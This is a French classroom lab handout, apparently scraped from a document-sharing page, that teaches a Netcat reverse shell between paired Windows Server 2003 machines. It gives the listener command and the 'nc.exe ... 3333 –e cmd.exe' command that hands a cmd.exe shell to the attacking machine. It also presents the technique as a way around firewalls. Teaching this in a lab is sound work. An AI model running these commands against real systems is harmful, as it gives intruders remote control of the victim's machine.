2

Click here to load reader

LAB 5 Reverse Shell Netcat

Embed Size (px)

Citation preview

Page 1: LAB 5 Reverse Shell Netcat

Reverse Shell avec Netcat

1 - Principe

Netcat est un outil réseau souvent appelé « TCP/IP swiss army knife ».

Avec cet outil on envoie des requêtes TCP/IP et on en reçoit. C’est très simple et très puissant !

Nous allons utiliser cet outil afin de se connecter à un ordinateur distant.

Ce qui est important à comprendre ici est le fait que nous allons « forcer » l’ordinateur distant à se

connecter à notre ordinateur et non l’inverse ! D’où le « Reverse » Shell. Nous ne faisons pas une

simple backdoor, qui est plus difficile à mettre en place car les pare-feux font leur boulot !

Ici la victime va ouvrir un prompt visible sur notre machine !

Cela permet de contourner les pare-feux, et nous allons voir comment.

2 - Exploit

Par groupe de 2. Nous utiliserons uniquement Windows Server 2003.

Nous allons récupérer l’outil « Netcat » à cette adresse :

http://joncraton.org/files/nc111nt.zip

Décompresser l’archive dans C:\Windows\system32

Lancez un prompt sur les 2 machines. (Exécuter -> cmd)

Puis aller dans le répertoire que vous venez de décompresser.

PARTIE ATTAQUE

Sur la machine qui attaque, nous allons écouter sur le port 3333 grâce à « netcat ».

Entrer cette commande :

nc.exe -v -L -p 3333 o –v permet d’afficher des détails en console o –L (listen) permet d’écouter les connexions entrantes o –p indique le port sur lequel on écoute

Désormais, n’importe quelle machine peut se connecter sur le port 3333 de notre machine

http://joncraton.org/files/nc111nt.zip
Page 2: LAB 5 Reverse Shell Netcat

PARTIE VICTIME

La victime doit se connecter sur le port 3333 de la machine qui attaque

Elle doit exécuter un shell afin d’ouvrir une session

Ici nous allons le faire à la main pour rendre les choses plus simple.

Pour cela entrer cette commande :

nc.exe (ipdelautremachine) 3333 –e cmd.exe

o –e précise la commande à exécuter lorsqu’une connexion est établie

La connexion est établie et un shell s’est ouvert sur la machine attaquante !

Screenshot de la machine qui attaque :

Vous avez désormais un shell sur la machine victime.

Nous avons ici exécuté la commande cmd.exe lors de la connexion mais on peut ouvrir d’autres

programmes ! VNC par exemple afin d’avoir le bureau à distance !

3 - Conclusion

Le reverse shell est très puissant car il permet de contourner les pare-feux.

La victime vient à nous et non l’inverse comme dans une simple backdoor.


shell 脚本编程 - read.pudn.comread.pudn.com/downloads172/ebook/798182/shell-programming.pdf · Shell的基本知识(2) 同传统的编程语言一样,shell提供了很多

shell 脚本编程 - read.pudn.comread.pudn.com/downloads172/ebook/798182/shell-programming.pdf · Shell的基本知识(2) 同传统的编程语言一样,shell提供了很多

Documents
Programmation système - Shell et Commandes UNIX · Shell Script shell Fichiers d’initialisation Substitution Variables Quotation Utilisation du shell Deux modes d’utilisation

Programmation système - Shell et Commandes UNIX · Shell Script shell Fichiers d’initialisation Substitution Variables Quotation Utilisation du shell Deux modes d’utilisation

Documents
Shell Mexphaltec · Title: Shell Mexphaltec Created Date: 10/27/2015 1:03:30 PM

Shell Mexphaltec · Title: Shell Mexphaltec Created Date: 10/27/2015 1:03:30 PM

Documents
Reverse engineering C# and - mathieualbert.free.frmathieualbert.free.fr/docs/RapportStage_MathieuAlbert.pdf · GroupeSodifrance UniversitédeNantes Nantes Reverse engineering C# and

Reverse engineering C# and - mathieualbert.free.frmathieualbert.free.fr/docs/RapportStage_MathieuAlbert.pdf · GroupeSodifrance UniversitédeNantes Nantes Reverse engineering C# and

Documents
ALTERNATIVE REVERSE OSMOSIS TO PURIFY LACTIC ACID …

ALTERNATIVE REVERSE OSMOSIS TO PURIFY LACTIC ACID …

Documents
REVERSE #23 preview

REVERSE #23 preview

Documents
Rapport de stage Shell

Rapport de stage Shell

Presentations & Public Speaking
SSH : Secure Shell

SSH : Secure Shell

Education
Programmation shell sous Unix/Linux - static.fnac … · Programmation shell sous Unix/Linux Programmation shell sous Unix/Linux sh, ksh, bash (avec exercices corrigés) Christine

Programmation shell sous Unix/Linux - static.fnac … · Programmation shell sous Unix/Linux Programmation shell sous Unix/Linux sh, ksh, bash (avec exercices corrigés) Christine

Documents
Reverse Mi Celle

Reverse Mi Celle

Documents
Commandes du Shell - Ubuntu

Commandes du Shell - Ubuntu

Documents
Programmation Shell Script

Programmation Shell Script

Education
Scripts shell Linux et Unix - eyrolles.com · Le shell Unix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 ... Exercices ... 160

Scripts shell Linux et Unix - eyrolles.com · Le shell Unix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 ... Exercices ... 160

Documents
Programmation Shell Unix

Programmation Shell Unix

Documents
CONÇU POUR TOUJOURS, COMME NOS HUILES … · shell lubricants together anything is possible conÇu pour toujours, comme nos huiles diÉlectriques shell diala avec shell diala, c’est

CONÇU POUR TOUJOURS, COMME NOS HUILES … · shell lubricants together anything is possible conÇu pour toujours, comme nos huiles diÉlectriques shell diala avec shell diala, c’est

Documents
Les Vieilles Soupapes Agricolesvieilles.soupapes.free.fr/someca_25/pdf/someca_25D_livret_entretien… · Cl SHELL T (S AE SHELL ROTELLA T SO Huile (SAE SHELL ROTELLA T (SAE DENTAX

Les Vieilles Soupapes Agricolesvieilles.soupapes.free.fr/someca_25/pdf/someca_25D_livret_entretien… · Cl SHELL T (S AE SHELL ROTELLA T SO Huile (SAE SHELL ROTELLA T (SAE DENTAX

Documents
Les Scripts Shell

Les Scripts Shell

Documents
Le shell UNIX

Le shell UNIX

Documents
Rapport de projet shell

Rapport de projet shell

Education
ReverseCodeEngineeringfiles.meetup.com/7108012/Reverse Code Engineering.pdf · Introduction! “Reverse!engineering &is&the&process&of&extracting&the& knowledge&ordesign&blueprints&from&anything&manH

ReverseCodeEngineeringfiles.meetup.com/7108012/Reverse Code Engineering.pdf · Introduction! “Reverse!engineering &is&the&process&of&extracting&the& knowledge&ordesign&blueprints&from&anything&manH

Documents
Shell Bitumes SHELL CARIPHALTE BOOK

Shell Bitumes SHELL CARIPHALTE BOOK

Documents
Programmation shell

Programmation shell

Education
Pr sentation Reverse Proxy - RESINFO · Inconvénients d’un Reverse Proxy • Le reverse proxy devient un point central : • son indisponibilitéentraîne celle de tous les serveurs

Pr sentation Reverse Proxy - RESINFO · Inconvénients d’un Reverse Proxy • Le reverse proxy devient un point central : • son indisponibilitéentraîne celle de tous les serveurs

Documents
Reverse Factoring: source alternative de financement

Reverse Factoring: source alternative de financement

Documents
Reverse factoring - source alternative de financement?

Reverse factoring - source alternative de financement?

Technology
Windows Power Shell

Windows Power Shell

Documents
Reverse Logistique.pdf

Reverse Logistique.pdf

Documents
Coliback, reverse e-logistique

Coliback, reverse e-logistique

Technology
PCR Amplification and Sequence Analyses of Reverse … · Palavras-chave adicionais: variabilidade genética, transposons, vassoura de bruxa, Theobroma cacao. INTRODUCTION Reverse

PCR Amplification and Sequence Analyses of Reverse … · Palavras-chave adicionais: variabilidade genética, transposons, vassoura de bruxa, Theobroma cacao. INTRODUCTION Reverse

Documents
Logistique inverse - Cinatis Reverse

Logistique inverse - Cinatis Reverse

Software